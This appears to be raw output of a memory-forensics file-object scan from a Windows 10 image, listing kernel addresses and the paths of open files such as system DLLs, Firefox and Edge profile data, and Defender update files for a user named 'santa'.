+0x918b75d96b90	\Windows\Fonts\segmdl2.ttf	216
+0x918b75d96d20	\Windows\System32\Windows.Networking.Sockets.PushEnabledApplication.dll	216
+0x918b75d96eb0	\Windows\System32\wuceffects.dll	216
+0x918b76024150	\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Admin.evtx	216
+0x918b760242e0	\Windows\System32\deviceassociation.dll	216
+0x918b76024470	\AsyncConnectHlp	216
+0x918b76024600	\MsFteWds	216
+0x918b76024790	\Windows\System32\ole32.dll	216
+0x918b76024920	\Windows\System32\config\COMPONENTS{fd9a35c3-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000002.regtrans-ms	216
+0x918b76024ab0	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b76024c40	\Endpoint	216
+0x918b76024dd0	\Windows\System32\usbmon.dll	216
+0x918b760250f0	\Windows\System32\PackageStateChangeHandler.dll	216
+0x918b76025280	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b76025410	\Windows\System32\snmpapi.dll	216
+0x918b760255a0	\Windows\System32\container.dll	216
+0x918b76025730	\Windows\System32\C_1256.NLS	216
+0x918b760258c0	\Windows\System32\dusmapi.dll	216
+0x918b76025a50	\Windows\System32\config\COMPONENTS{fd9a35c3-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000001.regtrans-ms	216
+0x918b76025be0	\CMNotify	216
+0x918b76025d70	\Windows\System32\wlidprov.dll	216
+0x918b76026090	\Windows\System32\tcpmon.dll	216
+0x918b76026220	\Windows\System32\wsnmp32.dll	216
+0x918b760263b0	\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx	216
+0x918b76026540	\Windows\System32\APMon.dll	216
+0x918b760266d0	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b76026860	\Windows\System32\twinui.appcore.dll	216
+0x918b760269f0	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b76026b80	\Windows\System32\InputLocaleManager.dll	216
+0x918b76026d10	\AsyncSelectHlp	216
+0x918b76026ea0	\Windows\System32\MusNotificationUx.exe	216
+0x918b760271c0	\$Directory	216
+0x918b76027350	\Windows\System32\C_1254.NLS	216
+0x918b760274e0	\Windows\System32\C_1253.NLS	216
+0x918b76027670	\Dev\Query	216
+0x918b76027800	\Windows\Registration\R000000000006.clb	216
+0x918b76027990	\Windows\System32\C_1251.NLS	216
+0x918b76027b20	\Windows\System32\AppResolver.dll	216
+0x918b76027cb0	\Windows\System32\en-US\APMon.dll.mui	216
+0x918b76027e40	\CMApi	216
+0x918b76028160	\Users\santa\AppData\Local\Microsoft\Windows\Caches\cversions.3.db	216
+0x918b760282f0	\Windows\Registration\R000000000006.clb	216
+0x918b76028480	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b76028610	\Windows\System32\cdpsvc.dll	216
+0x918b760287a0	\Windows\System32\WSDApi.dll	216
+0x918b76028930	\Windows\System32\C_1250.NLS	216
+0x918b76028ac0	\Windows\Web\Wallpaper\Theme1\Desktop.ini	216
+0x918b76028de0	\Windows\System32\Windows.StateRepositoryClient.dll	216
+0x918b76029100	\Windows\System32\tquery.dll	216
+0x918b76029420	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b760295b0	\Windows\System32\MTF.dll	216
+0x918b76029740	\Dev\Query	216
+0x918b760298d0	\Windows\System32\UiaManager.dll	216
+0x918b76029a60	\CMApi	216
+0x918b76029bf0	\Windows\System32\webservices.dll	216
+0x918b76029d80	\gecko.4576.3988.585370181143719742	216
+0x918b7602a0a0	\Windows\System32\mssrch.dll	216
+0x918b7602a230	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Assets\Blank_PhotosSplashWideTile.png	216
+0x918b7602a3c0	\$Directory	216
+0x918b7602a550	\Users\santa\AppData\Roaming\Microsoft\Windows\Recent\The Internet.lnk	216
+0x918b7602a6e0	\Windows	216
+0x918b7602a870	\Windows	216
+0x918b7602aa00	\$Directory	216
+0x918b7602ab90	\Windows\System32\Windows.CloudStore.Schema.Shell.dll	216
+0x918b7602ad20	\Windows\System32\sbservicetrigger.dll	216
+0x918b7602aeb0	\$Directory	216
+0x918b7602b1d0	\Windows\System32\keyiso.dll	216
+0x918b7602b360	\Windows\System32\EAMProgressHandler.dll	216
+0x918b7602b4f0	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b7602b680	\Windows\System32\drvstore.dll	216
+0x918b7602b810	\Windows\System32\daxexec.dll	216
+0x918b7602b9a0	\Windows\System32\threadpoolwinrt.dll	216
+0x918b7602bb30	\Windows\System32\Windows.Shell.BlueLightReduction.dll	216
+0x918b7602bcc0	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b7602be50	\Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	216
+0x918b7602c170	\Windows\System32\CoreShellExtFramework.dll	216
+0x918b7602c300	\Windows\System32\wpnclient.dll	216
+0x918b7602c490	\Windows\System32\spool\prtprocs\x64\winprint.dll	216
+0x918b7602c620	\$Directory	216
+0x918b7602c7b0	\Program Files (x86)\Mozilla Firefox	216
+0x918b7602c940	\Windows\System32\wshbth.dll	216
+0x918b7602cad0	\CMApi	216
+0x918b7602cdf0	\Windows\System32\ContentDeliveryManager.Utilities.dll	216
+0x918b7602d110	\Windows\System32\en-US\datamap.0409.dat	216
+0x918b7602d2a0	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b7602d430	\Windows\System32\twinui.pcshell.dll	216
+0x918b7602d5c0	\Endpoint	216
+0x918b7602d750	\Windows\System32\en-US\inetpp.dll.mui	216
+0x918b7602d8e0	\Windows\System32\wpnapps.dll	216
+0x918b7602da70	\Windows\System32\imageres.dll	216
+0x918b7602dc00	\$Directory	216
+0x918b7602dd90	\Windows\Fonts\mmrtext.ttf	216
+0x918b7602e0b0	\$Directory	216
+0x918b7602e240	\Windows\SysWOW64\mswsock.dll	216
+0x918b7602e3d0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb	216
+0x918b7602e560	\Windows\SystemResources\imageres.dll.mun	216
+0x918b7602e6f0	\CMApi	216
+0x918b7602ea10	\Windows\System32\AuthExt.dll	216
+0x918b7602eba0	\$Directory	216
+0x918b7602ed30	\SwDevice	216
+0x918b7602f1e0	\$Directory	216
+0x918b7602f370	\$Directory	216
+0x918b7602f500	\Windows\System32\inetpp.dll	216
+0x918b7602f690	\$Directory	216
+0x918b7602f820	\Windows\System32\Windows.StateRepositoryBroker.dll	216
+0x918b7602f9b0	\Windows\System32\win32spl.dll	216
+0x918b7602fcd0	\Windows\System32\ieproxy.dll	216
+0x918b7602fe60	\Windows\System32\en-US\win32spl.dll.mui	216
+0x918b76030180	\Dev\Query	216
+0x918b76030310	\Windows\System32	216
+0x918b760304a0	\Program Files (x86)\Mozilla Firefox	216
+0x918b76030630	\Windows\System32\en-US\AuthExt.dll.mui	216
+0x918b760307c0	\Windows\Prefetch\MICROSOFTEDGEUPDATE.EXE-96674210.pf	216
+0x918b76030950	\Windows\System32\spool\drivers\W32X86\PCC	216
+0x918b76030ae0	\Windows\System32\wscui.cpl	216
+0x918b76030c70	\Windows\System32\wups2.dll	216
+0x918b76030e00	\Users\santa\AppData\Local\Temp\MicrosoftEdgeUpdate.log	216
+0x918b76031120	\$Directory	216
+0x918b760312b0	\Windows\System32	216
+0x918b760315d0	\Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	216
+0x918b76031760	\Windows\SysWOW64\TextInputFramework.dll	216
+0x918b760318f0	\SwDevice	216
+0x918b76031a80	\Windows\System32\PhotoMetadataHandler.dll	216
+0x918b760320c0	\Windows\System32\twinapi.dll	216
+0x918b76032570	\CMNotify	216
+0x918b76032700	\Windows\System32\imm32.dll	216
+0x918b76032890	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b76032a20	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.jfm	216
+0x918b76032ed0	\CMNotify	216
+0x918b760331f0	\Dev\Query	216
+0x918b76033380	\Endpoint	216
+0x918b76033510	\SwDevice	216
+0x918b760336a0	\Windows\System32\vaultcli.dll	216
+0x918b76033830	\SwDevice	216
+0x918b760339c0	\Windows\System32\NetworkStatus.dll	216
+0x918b76033b50	\gecko.4576.3988.585370181143719742	216
+0x918b76033ce0	\$Directory	216
+0x918b76033e70	\$Directory	216
+0x918b76034190	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b76034320	\$Directory	216
+0x918b760344b0	\Windows\System32\en-US\ieframe.dll.mui	216
+0x918b76034640	\Windows\System32\ieframe.dll	216
+0x918b76034960	\Windows\Fonts\segoeuib.ttf	216
+0x918b76034af0	\Windows\System32\StartTileData.dll	216
+0x918b76034c80	\Windows\System32\msi.dll	216
+0x918b76034e10	\Windows\System32\en-US\shell32.dll.mui	216
+0x918b76035130	\Windows\SysWOW64\wshqos.dll	216
+0x918b760352c0	\Users\santa\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK	216
+0x918b76035450	\Windows\Fonts\cambriai.ttf	216
+0x918b760355e0	\$Directory	216
+0x918b76035770	\Windows\System32\en-US\MusNotifyIcon.exe.mui	216
+0x918b76035900	\gecko.4576.3988.18146219246632876385	216
+0x918b76035a90	\$Directory	216
+0x918b76035c20	\Windows\System32\MusNotificationUx.exe	216
+0x918b76035db0	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b760360d0	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b76036260	\Users\santa\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db	216
+0x918b760363f0	\Windows\Fonts\times.ttf	216
+0x918b76036710	\Windows\Registration\R000000000006.clb	216
+0x918b760368a0	\Windows\System32\sppc.dll	216
+0x918b76036a30	\$Directory	216
+0x918b76036bc0	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b76036ee0	\$Directory	216
+0x918b76037200	\Windows\System32\spool\drivers\x64\PCC	216
+0x918b76037390	\Windows\System32\Windows.UI.Xaml.Resources.Common.dll	216
+0x918b76037520	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{0050F440-DE0F-48EE-A4F2-CDD94F01CAB6}.catalogItem	216
+0x918b760376b0	\Windows\System32\spp\store\2.0\tokens.dat	216
+0x918b760379d0	\$Directory	216
+0x918b76037b60	\Windows\System32	216
+0x918b76037e80	\$Directory	216
+0x918b76038330	\Windows\System32\NotificationControllerPS.dll	216
+0x918b760384c0	\Windows\System32\vm3ddevapi64.dll	216
+0x918b76038650	\$Directory	216
+0x918b760387e0	\$Directory	216
+0x918b76038970	\Windows	216
+0x918b76038c90	\Windows\System32\spool\drivers\W32X86\PCC	216
+0x918b76038e20	\Windows\System32\Windows.ApplicationModel.Core.dll	216
+0x918b76039140	\Windows\System32\wbem\wmiprov.dll	216
+0x918b760392d0	\Windows\Registration\R000000000006.clb	216
+0x918b760395f0	\$ConvertToNonresident	216
+0x918b76039780	\$Directory	216
+0x918b76039910	\$Directory	216
+0x918b76039aa0	\Windows\System32\MitigationClient.dll	216
+0x918b76039c30	\$Directory	216
+0x918b76039dc0	\gecko.4576.3988.4692312835060683011	216
+0x918b7603a0e0	\Endpoint	216
+0x918b7603a270	\Windows\System32\config\COMPONENTS.LOG1	216
+0x918b7603a400	\Windows\System32\config\COMPONENTS.LOG2	216
+0x918b7603a720	\Endpoint	216
+0x918b7603a8b0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\CacheStorage\CacheStorage.jfm	216
+0x918b7603aa40	\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4ActionCenter.evtx	216
+0x918b7603abd0	\CMNotify	216
+0x918b7603ad60	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b7603aef0	\$Directory	216
+0x918b7603b080	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b7603b210	\Program Files (x86)\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi	216
+0x918b7603b3a0	\CMNotify	216
+0x918b7603b850	\Windows\System32\vm3ddevapi64-release.dll	216
+0x918b7603bb70	\Windows\System32	216
+0x918b7603bd00	\Windows\System32\spool\drivers\x64\PCC	216
+0x918b7603be90	\Endpoint	216
+0x918b7603c340	\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.401.765.0.exe	216
+0x918b7603c4d0	\$Directory	216
+0x918b7603c660	\gecko.4576.3988.18146219246632876385	216
+0x918b7603c7f0	\$Directory	216
+0x918b7603c980	\$Directory	216
+0x918b7603cb10	\ProgramData\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\User.dat	216
+0x918b7603cca0	\$Directory	216
+0x918b7603d150	\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll	216
+0x918b7603d2e0	\Windows\System32\spool\drivers\x64\PCC	216
+0x918b7603d470	\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx	216
+0x918b7603d600	\Windows\Temp\E39618F2-C692-4495-9595-CD89B93B468221c0.1da1a23e07d5c34\1.401.765.0_to_1.401.798.0_mpasdlta.vdm._p	216
+0x918b7603d790	\Program Files\WindowsApps\Microsoft.SkypeApp_15.108.3205.0_x64__kzf8qxf38zg5c\Skype\vccorlib140.dll	216
+0x918b7603d920	\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll	216
+0x918b7603dab0	\Windows\SysWOW64\vccorlib140.dll	216
+0x918b7603dc40	\Windows\System32\DeviceDirectoryClient.dll	216
+0x918b7603e0f0	\Windows\System32\spool\drivers\x64\PCC	216
+0x918b7603e280	\$Directory	216
+0x918b7603e5a0	\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll	216
+0x918b7603e8c0	\Windows\System32\SndVolSSO.dll	216
+0x918b7603ea50	\gecko.4576.3988.1511846534483018721	216
+0x918b7603ed70	\Windows\System32\SettingSyncCore.dll	216
+0x918b7603f090	\$Directory	216
+0x918b7603f220	\$Directory	216
+0x918b7603f3b0	\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask	216
+0x918b7603f540	\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4LogonTasksChannel.evtx	216
+0x918b7603f6d0	\Program Files\WindowsApps\Microsoft.SkypeApp_15.108.3205.0_x64__kzf8qxf38zg5c\Skype\msvcp140.dll	216
+0x918b7603f9f0	\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx	216
+0x918b7603fb80	\Windows\System32\spool\drivers\x64\PCC	216
+0x918b7603fd10	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\idb\4167130407yCt7G%cCf7C%o7ndfci6g.sqlite	216
+0x918b7603fea0	\1840.1da1a23c79ec4cf	216
+0x918b760401c0	\Windows\System32\wpdshext.dll	216
+0x918b76040350	\Windows\System32\prm0009.dll	216
+0x918b760404e0	\Windows\System32\en-US\NotificationController.dll.mui	216
+0x918b76040670	\gecko.4576.3988.5164763320614748629	216
+0x918b76040800	\$Directory	216
+0x918b76040990	\gecko.4576.3988.5164763320614748629	216
+0x918b76040b20	\Windows\System32\oleacc.dll	216
+0x918b76040e40	\Windows\System32\DevDispItemProvider.dll	216
+0x918b76041160	\Windows\System32\en-US\oleaccrc.dll.mui	216
+0x918b760412f0	\Windows\System32\DataExchange.dll	216
+0x918b76041480	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b76041610	\Windows\System32\en-US\combase.dll.mui	216
+0x918b760417a0	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b76041ac0	\Windows\System32\ExplorerFrame.dll	216
+0x918b76041c50	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b76041de0	\Windows\System32\RTWorkQ.dll	216
+0x918b76042100	\Windows\System32\StructuredQuery.dll	216
+0x918b76042290	\Windows\Fonts\StaticCache.dat	216
+0x918b760425b0	\Windows\System32\en-US\netmsg.dll.mui	216
+0x918b76042740	\Windows\Registration\R000000000006.clb	216
+0x918b760428d0	\Windows\System32\spp\plugin-manifests-signed\sppwinob-spp-plugin-manifest-signed.xrm-ms	216
+0x918b76042bf0	\Windows\System32\oleaccrc.dll	216
+0x918b76042d80	\Windows\System32\wbem\WmiPerfInst.dll	216
+0x918b760430a0	\gecko.4576.3988.1511846534483018721	216
+0x918b76043230	\Windows\Temp\E39618F2-C692-4495-9595-CD89B93B468221c0.1da1a23e07d5c34\1.401.765.0_to_1.401.798.0_mpavdlta.vdm._p	216
+0x918b760433c0	\Windows\System32\MSWB7.dll	216
+0x918b76043550	\LOCAL\cubeb-pipe-4576-13	216
+0x918b760436e0	\Windows\System32\spp\plugin-manifests-signed\sppobjs-spp-plugin-manifest-signed.xrm-ms	216
+0x918b76043870	\Windows\Registration\R000000000006.clb	216
+0x918b76043b90	\Windows\System32\en-US\wscui.cpl.mui	216
+0x918b76043eb0	\Windows\SysWOW64\MrmCoreR.dll	216
+0x918b76060a00	੘瘆醋￿੘瘆醋￿	0
+0x918b760df2e0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\cversions.3.db	216
+0x918b760df470	\Windows\System32	216
+0x918b760df600	\ProgramData\Microsoft\Windows\OneSettings\config.json	216
+0x918b760df790	\Windows\System32\thumbcache.dll	216
+0x918b760dfab0	\Windows\System32\CBDHSvc.dll	216
+0x918b760dfc40	\Windows\Registration\R000000000006.clb	216
+0x918b760dfdd0	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b760e00f0	\$Directory	216
+0x918b760e0280	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b760e0410	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b760e05a0	\Windows\SysWOW64\FWPUCLNT.DLL	216
+0x918b760e0730	\Windows\System32\windows.applicationmodel.datatransfer.dll	216
+0x918b760e0a50	\CMApi	216
+0x918b760e0be0	\Windows\System32\MusNotifyIcon.exe	216
+0x918b760e0d70	\Windows\Fonts\timesbi.ttf	216
+0x918b760e1090	\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx	216
+0x918b760e1220	\Windows\Fonts\timesbd.ttf	216
+0x918b760e13b0	\Windows\System32\windows.immersiveshell.serviceprovider.dll	216
+0x918b760e1540	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868	216
+0x918b760e16d0	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-wal	216
+0x918b760e1860	\Windows\System32\svchost.exe	216
+0x918b760e19f0	\Windows\System32\edputil.dll	216
+0x918b760e1b80	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db	216
+0x918b760e1d10	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b760e1ea0	\Windows\Fonts\timesi.ttf	216
+0x918b760e21c0	\Windows\System32	216
+0x918b760e2350	\Windows\System32\ntshrui.dll	216
+0x918b760e24e0	\ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpavdlta.vdm	216
+0x918b760e2990	\CMNotify	216
+0x918b760e2b20	\CMNotify	216
+0x918b760e2cb0	\ProgramData\Microsoft\Windows\OneSettings\UsoSettings.json	216
+0x918b760e2e40	\Windows\System32\wbem\NCProv.dll	216
+0x918b760e3160	\$Directory	216
+0x918b760e32f0	\Windows\System32\cldapi.dll	216
+0x918b760e3480	\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER	216
+0x918b760e37a0	\Windows\Prefetch\MUSNOTIFYICON.EXE-19B43B6D.pf	216
+0x918b760e3930	\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Backup Scan	216
+0x918b760e3ac0	\ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpasdlta.vdm	216
+0x918b760e3c50	\Windows\Temp\E39618F2-C692-4495-9595-CD89B93B468221c0.1da1a23e07d5c34\mpavdlta.vdm	216
+0x918b760e3de0	\ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpasbase.vdm	216
+0x918b760e4100	\Windows\System32\ApplicationFrame.dll	216
+0x918b760e4290	\Windows\System32\winbrand.dll	216
+0x918b760e4420	\Windows\System32\Pimstore.dll	216
+0x918b760e45b0	\Windows\System32\twinui.dll	216
+0x918b760e4740	\ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpasdlta.vdm	216
+0x918b760e48d0	\ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpavbase.vdm	216
+0x918b760e4a60	\Windows\Temp\E39618F2-C692-4495-9595-CD89B93B468221c0.1da1a23e07d5c34\mpasdlta.vdm	216
+0x918b760e4bf0	\Windows\Temp\E39618F2-C692-4495-9595-CD89B93B468221c0.1da1a23e07d5c34\mpavdlta.vdm	216
+0x918b760e4d80	\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb	216
+0x918b760e50a0	\Windows\Temp\E39618F2-C692-4495-9595-CD89B93B468221c0.1da1a23e07d5c34\mpasdlta.vdm	216
+0x918b760e5230	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b760e53c0	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	216
+0x918b760e5550	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db	216
+0x918b760e56e0	\$Directory	216
+0x918b760e5870	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\BingConfigurationClient.dll	216
+0x918b760e5a00	\Users\santa\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm	216
+0x918b760e5b90	\$Directory	216
+0x918b760e5d20	\Windows\System32\ConstraintIndex.Search.dll	216
+0x918b760e5eb0	\$Directory	216
+0x918b760e61d0	\Windows\System32\APHostClient.dll	216
+0x918b760e64f0	\Windows\System32\tzres.dll	216
+0x918b760e6680	\Windows\System32\en-US\urlmon.dll.mui	216
+0x918b760e6810	\Windows\System32\en-US\mshtml.dll.mui	216
+0x918b760e69a0	\Windows\System32\en-US\tzres.dll.mui	216
+0x918b760e6b30	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.12.3.18362_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1	216
+0x918b760e7170	\Windows\System32\accountaccessor.dll	216
+0x918b760e7300	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll	216
+0x918b760e7490	\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\AC Power Download	216
+0x918b760e7620	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b760e77b0	\Windows\System32\jscript9.dll	216
+0x918b760e7ad0	\$Directory	216
+0x918b760e7c60	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.StartMenuExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1046918562-1299961717-1331875240-1001.pckgdep	216
+0x918b760e7df0	\Windows\Registration\R000000000006.clb	216
+0x918b760e8110	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b760e82a0	\$Directory	216
+0x918b760e8430	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.12.3.18362_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat	216
+0x918b760e85c0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.12.3.18362_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2	216
+0x918b760e8750	\Users\santa\Pictures\wallpaper.png	216
+0x918b760e88e0	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\wallpaper.png	216
+0x918b760e8a70	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{49040C94-439D-4181-939B-400DF4927C3F}.catalogItem	216
+0x918b760e8d90	\Windows\SysWOW64\msvcp140.dll	216
+0x918b760e90b0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{444D7E83-38FD-41A7-B6C9-E2408C16522A}.catalogItem	216
+0x918b760e9240	\$Directory	216
+0x918b760e93d0	\Windows\System32\HolographicExtensions.dll	216
+0x918b760e9560	\Windows\System32\linkinfo.dll	216
+0x918b760e96f0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{34A29904-08E5-4E25-8DFA-E11604620A36}.catalogItem	216
+0x918b760e9880	\Windows\System32\wuapihost.exe	216
+0x918b760e9a10	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{4A28E9F2-073A-4423-A514-4213FFEFEBBA}.catalogItem	216
+0x918b760e9ba0	\Windows\System32\VirtualMonitorManager.dll	216
+0x918b760e9d30	\$Directory	216
+0x918b760ea1e0	\$Directory	216
+0x918b760ea370	\Windows\System32\en-US\MMDevAPI.dll.mui	216
+0x918b760ea500	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{3F8A46C6-51AA-4DE5-B34D-84B7720C385E}.catalogItem	216
+0x918b760ea690	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{36EEEF0D-07D7-461B-BD63-4D59DBAAA9F1}.catalogItem	216
+0x918b760ea820	\srvsvc	216
+0x918b760ea9b0	\Windows\System32\provthrd.dll	216
+0x918b760eab40	\Windows\System32\security.dll	216
+0x918b760eacd0	\Windows\System32\Windows.Web.Http.dll	216
+0x918b760eae60	\$Directory	216
+0x918b760eb180	\$Directory	216
+0x918b760eb310	\$Directory	216
+0x918b760eb4a0	\Windows\System32\schedcli.dll	216
+0x918b760eb630	\Users\santa\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db	216
+0x918b760eb7c0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{3FDEDDC5-ACC3-45B4-8673-DB8404A61C04}.catalogItem	216
+0x918b760eb950	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{5D04056B-EE2D-4D26-9D9A-5E94F6BD26BD}.catalogItem	216
+0x918b760ebc70	\$Directory	216
+0x918b760ebe00	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{9DB307E7-AED6-43BD-A9D9-74DCFFA69083}.catalogItem	216
+0x918b760ec2b0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{60166A20-898B-4410-8545-F859A33EE497}.catalogItem	216
+0x918b760ec440	\Windows\SysWOW64\vcruntime140.dll	216
+0x918b760ec5d0	\Windows\Registration\R000000000006.clb	216
+0x918b760ec8f0	\Windows\System32\winevt\Logs\State.evtx	216
+0x918b760eca80	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	216
+0x918b760ecc10	\Endpoint	216
+0x918b760ed0c0	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db	216
+0x918b760ed250	\Users\santa\Pictures\wallpaper.png	216
+0x918b760ed3e0	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\wallpaper.png	216
+0x918b760ed570	\Windows\System32\en-US\twinui.pcshell.dll.mui	216
+0x918b760ed700	\Windows\System32\AboveLockAppHost.dll	216
+0x918b760eda20	\Windows\System32\NPSM.dll	216
+0x918b760edbb0	\Windows\System32\Windows.Web.dll	216
+0x918b760edd40	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{5D34A17C-E779-43E3-8F10-9B8EC079AB07}.catalogItem	216
+0x918b760eded0	\Users\santa\Searches\desktop.ini	216
+0x918b760ee1f0	\Windows\System32\wbem\ntevt.dll	216
+0x918b760ee380	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncShell64.dll	216
+0x918b760ee510	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{9AED473A-31C1-465E-BC4E-33B9015007B6}.catalogItem	216
+0x918b760ee6a0	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b760ee830	\Windows\System32\EhStorShell.dll	216
+0x918b760ee9c0	\$Directory	216
